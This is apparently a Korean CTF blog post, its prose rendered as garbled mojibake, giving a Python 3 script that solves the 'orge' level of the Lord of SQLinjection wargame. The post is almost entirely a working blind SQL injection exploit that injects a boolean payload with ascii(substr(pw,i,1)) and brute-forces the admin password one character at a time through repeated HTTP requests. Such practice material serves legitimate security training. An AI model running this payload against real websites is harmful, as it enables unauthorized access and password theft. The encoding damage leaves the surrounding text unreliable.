๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
๐ŸดCTF/Lord of SQLinjection

Lord of SQLinjection - orge ํŒŒ์ด์ฌ3 ์ž๋™ํ™” ๋„๊ตฌ

by Janger 2021. 12. 7.
728x90
๋ฐ˜์‘ํ˜•

https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php

 

https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php

 

los.rubiya.kr

 

import requests

parameter = None



cookie = {'PHPSESSID':'์—ฌ๊ธฐ๋‹ค ์ž์‹ ์˜ ์ฟ ํ‚ค ๊ฐ’์„ ๋„ฃ์Œ'}

result = None

solve = ""
	
for i in range(1, 8+1):
	

	for ascii in range(48, 112+1):
		print(ascii)
		parameter = "?pw='|| id='admin'%26%26 ascii(substr(pw,{},1))={}%23".format(i, ascii)
		url = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php" + parameter
		result = requests.get(url=url, cookies=cookie).text
		if "Hello admin" in result:
			print(i, ascii, chr(ascii))
			solve += chr(ascii)
			break
			
print( solve )

requests ๋ชจ๋“ˆ ํ•„์š”.

728x90
๋ฐ˜์‘ํ˜•

'๐ŸดCTF > Lord of SQLinjection' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

Lord of SQLinjection - bugbear  (0) 2021.12.07
Lord of SQLinjection - darkknight  (0) 2021.12.07
Lord of SQLinjection - skeleton  (0) 2021.12.07
Lord of SQLinjection - vampire  (0) 2021.12.07
Lord of SQLinjection - troll  (0) 2021.12.07

๊ด€๋ จ๊ธ€

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”